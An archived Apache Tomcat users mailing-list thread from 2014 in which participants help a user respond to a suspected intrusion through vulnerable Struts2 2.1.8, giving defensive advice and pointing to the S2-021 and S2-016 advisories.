> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i
> YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd
> zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ
> q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o
> TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU
> 8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz
> 6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP
> 9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k
> z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt
> klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK
> a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz
> /V2lPhNpr08bYy+s2pkN
> =4tjy
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Leonardo,
On 5/5/14, 10:29 AM, Leonardo Santagostini wrote:
> Well thread dump is here
>
> https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Seems
>
like it's broken.
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTZ6bFAAoJEBzwKT+lPKRY57YP/3sstUfEdBSUTlNpzipRUN+i
YnVNnO9lb6Ax1Ab2+I0c8crUx/rEWFFqG3m0mmsfBzYvny0r34kQ0PKfS/QSjZxd
zQ5ft+1kRoOvWsdq8m9c+oPrh3i2OhLMDxGhnmnZT5NQu54dTOBdLKOhFb4z0WyZ
q4G2RCPSlGD5v1m20MXMoMbkmHFagrgYUHzZSmrlcXwaj+TNgOzLdpxvfr7v4z0o
TjACc6H9If3YY+/qHE4E0KFnpZGxuHynL62BDnTenpiP8aQ+dijVxUeom9cprLIU
8M6eDLIDtopaLYxLPAvpxNuzB7HIam0Ib+5Yq4c12N1lUFEw0EKVoFbYGu08yyEz
6RHH2VCToUJtC2R5WYC/cBS86y5Ni5pwgHmaA1QeaqgKC8zbH0pRVxu/Q9NUm0vP
9E1d4m2b6p77z7lmEEA+c/hXfeR9n72btc+iQklPzDrPXBUXQnGNwo3s8VFA7e/k
z4VrcURWl/dvWLTAWE3A4kv21R+3ZhCKewfN3x8ItF57Kq6YaTJJ2y8EH133zIxt
klyG/1SE6TP9hAKFGQs3pQE+oAHZHMbJMlM/2cLwZXfFu2hPDBkrnk56YLC6SSSK
a8Fgdwdo81CkhxGxd5aaFOfHqru9hFZIHsVqHmhFL5hJ6H84a7cL/prOPHu7k2rz
/V2lPhNpr08bYy+s2pkN
=4tjy
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Well thread dump is here
https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing
Let me know if im missing something.
thanks !
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-05 9:34 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello all, sorry for the late, but i was in holiday from wednesday.
>
> Ok, i make a ticket to developers for upgrading strus. They told me that
> will work on that.
>
> So, i will keep in touch with the news =)
>
> Again, thanks all for all the support you give me.
>
> Regards,
> Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-05-01 18:48 GMT-03:00 Christopher Schultz <
> chris@christopherschultz.net>:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA256
>>
>> Cédric,
>>
>> On 5/1/14, 10:00 AM, Cédric Couralet wrote:
>> > 2014-04-30 19:07 GMT+02:00 Christopher Schultz
>> > <chris@christopherschultz.net
>> >> :
>> >
>> > Leonardo,
>> >
>> > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>> >>>> Im uploading mi logfiles so it will be available when
>> >>>> finished uploading.
>> >
>> > Remember to get a thread dump while Runtime.exec() is running.
>> >
>> > You should copy the script /tmp/4.sh somewhere else so you have a
>> > copy in case the attacker tries to clean-up after themselves.
>> > That's certainly what's doing the evil work.
>> >
>> > You could probably set up iptables or something to restrict
>> > outgoing requests so that the attack can't progress across your
>> > network.
>> >
>> >>>> Regarding the configuration, its working in two other sites
>> >>>> without problem, and there is no problem putting L4 balancing
>> >>>> with haproxy.
>> >>>>
>> >>>> I have asked developers about that exploit, still without
>> >>>> answer.
>> >
>> > You appear to be using struts2 2.1.8, which is in the range of
>> > versions vulnerable to this bug. There is a workaround that you
>> > can probably apply:
>> > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
>> > last section on this page).
>> >
>> >> Of course, the vulnerability doesn't allow you to simply inject
>> >> code
>> > or anything like that: you can certainly mess-around with code that
>> > is already available on the site, though.
>> >
>> >
>> >> I think the S2-021 can be used to inject code. There is a POC
>> >> circulating proving it. That said, this struts version (2.1.8) is
>> >> also vulnerable to
>> >> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
>> >> permits code execution very easily.
>>
>> Ouch. Yeah, there's always that ;)
>>
>> - -chris
>> -----BEGIN PGP SIGNATURE-----
>> Version: GnuPG v1
>> Comment: GPGTools - http://gpgtools.org
>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>
>> iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
>> Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
>> tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
>> iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
>> qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
>> MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
>> ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
>> HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
>> J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
>> vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
>> IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
>> hEEF98sa1D+pfJC5FGdj
>> =ZJPK
>> -----END PGP SIGNATURE-----
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello all, sorry for the late, but i was in holiday from wednesday.
Ok, i make a ticket to developers for upgrading strus. They told me that
will work on that.
So, i will keep in touch with the news =)
Again, thanks all for all the support you give me.
Regards,
Leonardo
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-05-01 18:48 GMT-03:00 Christopher Schultz <chris@christopherschultz.net
>:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA256
>
> Cédric,
>
> On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> > 2014-04-30 19:07 GMT+02:00 Christopher Schultz
> > <chris@christopherschultz.net
> >> :
> >
> > Leonardo,
> >
> > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
> >>>> Im uploading mi logfiles so it will be available when
> >>>> finished uploading.
> >
> > Remember to get a thread dump while Runtime.exec() is running.
> >
> > You should copy the script /tmp/4.sh somewhere else so you have a
> > copy in case the attacker tries to clean-up after themselves.
> > That's certainly what's doing the evil work.
> >
> > You could probably set up iptables or something to restrict
> > outgoing requests so that the attack can't progress across your
> > network.
> >
> >>>> Regarding the configuration, its working in two other sites
> >>>> without problem, and there is no problem putting L4 balancing
> >>>> with haproxy.
> >>>>
> >>>> I have asked developers about that exploit, still without
> >>>> answer.
> >
> > You appear to be using struts2 2.1.8, which is in the range of
> > versions vulnerable to this bug. There is a workaround that you
> > can probably apply:
> > http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
> > last section on this page).
> >
> >> Of course, the vulnerability doesn't allow you to simply inject
> >> code
> > or anything like that: you can certainly mess-around with code that
> > is already available on the site, though.
> >
> >
> >> I think the S2-021 can be used to inject code. There is a POC
> >> circulating proving it. That said, this struts version (2.1.8) is
> >> also vulnerable to
> >> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
> >> permits code execution very easily.
>
> Ouch. Yeah, there's always that ;)
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
> Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
> tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
> iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
> qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
> MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
> ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
> HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
> J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
> vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
> IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
> hEEF98sa1D+pfJC5FGdj
> =ZJPK
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cédric,
On 5/1/14, 10:00 AM, Cédric Couralet wrote:
> 2014-04-30 19:07 GMT+02:00 Christopher Schultz
> <chris@christopherschultz.net
>> :
>
> Leonardo,
>
> On 4/30/14, 12:48 PM, Leonardo Santagostini wrote:
>>>> Im uploading mi logfiles so it will be available when
>>>> finished uploading.
>
> Remember to get a thread dump while Runtime.exec() is running.
>
> You should copy the script /tmp/4.sh somewhere else so you have a
> copy in case the attacker tries to clean-up after themselves.
> That's certainly what's doing the evil work.
>
> You could probably set up iptables or something to restrict
> outgoing requests so that the attack can't progress across your
> network.
>
>>>> Regarding the configuration, its working in two other sites
>>>> without problem, and there is no problem putting L4 balancing
>>>> with haproxy.
>>>>
>>>> I have asked developers about that exploit, still without
>>>> answer.
>
> You appear to be using struts2 2.1.8, which is in the range of
> versions vulnerable to this bug. There is a workaround that you
> can probably apply:
> http://struts.apache.org/release/2.3.x/docs/s2-021.html (see the
> last section on this page).
>
>> Of course, the vulnerability doesn't allow you to simply inject
>> code
> or anything like that: you can certainly mess-around with code that
> is already available on the site, though.
>
>
>> I think the S2-021 can be used to inject code. There is a POC
>> circulating proving it. That said, this struts version (2.1.8) is
>> also vulnerable to
>> http://struts.apache.org/release/2.3.x/docs/s2-016.html which
>> permits code execution very easily.
Ouch. Yeah, there's always that ;)
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYsE7AAoJEBzwKT+lPKRYwqUP/1E6TUIJq618bPN0KzzvQbC4
Hny9racWUoNKFayWa9Xz/uWbQvXADyPnjO9q1BhcZW4TMyBTTksSUo33JAy567Sn
tspV1ldMdOcL+y7KQUNJb9VJI9CV5h2nkeoaZacm8qmg9fZUqTihhz+qRC/U9JMa
iJGKlLYIjvzPFrTXsoFnGl9yT54JAXvDf8aJPiSimD1Mu78KXCRhhterIH5QscI1
qstciSIllaSeq6EccM7b9hH4tEEXT/PwjiEoV1zSzxP01XT1qPnxtyRtNhWxer2p
MDzDEimTNVshy9ilXa3MTBZh9hLcp3uEsUqmgSQyLAeLEKEEqQcsOkpQHfn9JOQQ
ZXJVvhM1PuM4YsMoRcenu5Otdc5AUPh31b614Mc1NBtFRj/DVARWCU1u0Rb+mTTW
HsNeRhmTfGp09x2NCokW2ncMV+coytjUwbfPGZ2yQAIZCC8k9EAxI942cKzsBVdU
J7Ch3J9EEy0WxEiX8zDrHjNWWwmRBf0BexEQqnnCgQCMWAoVjRcPo75LChY60uDP
vvB5Z/iGtbfFSwKEPVvYJhDzMJm3tlxVVdhmT+nejig6S4vdhAY/yDIxnNUm7waE
IEJ7xtN5Ev3XLxT1fR34kw3n+0aRXiWyZzMTr2gTyf6C/Y9moz0wPyliBz0qKh67
hEEF98sa1D+pfJC5FGdj
=ZJPK
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org